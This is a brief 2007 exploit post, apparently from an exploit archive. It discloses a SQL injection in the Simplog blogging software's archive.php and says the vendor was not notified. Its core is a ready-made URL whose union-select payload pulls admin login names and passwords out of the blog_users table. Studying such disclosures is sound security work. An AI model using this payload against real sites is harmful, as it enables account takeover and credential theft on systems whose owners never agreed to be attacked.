Home / exploits simplog0932.txt
Posted on 02 January 2007
Afected Software: simplog up to 0.9.3.2 (latest version - 12/05/2006 ) Site: http://www.simplog.org Simplog provides an easy way for users to add blogging capabilities to their existing websites. Simplog is written in PHP and compatible with multiple databases. Simplog also features an RSS/Atom aggregator/reader. Powerful, yet simple Vulnerability: SQL Injection in archive.php other files probably also affected Example: http://example.com/simplog/archive.php?blogid=1&pid=1111%20union%20select%201,1,1,login,1,password,1,1%20from%20blog_users%20where%20admin=1 Vendor status: NOT NOTIFIED Javor Ninov aka DrFrancky drfrancky shift+2 securax.org http://securitydot.net/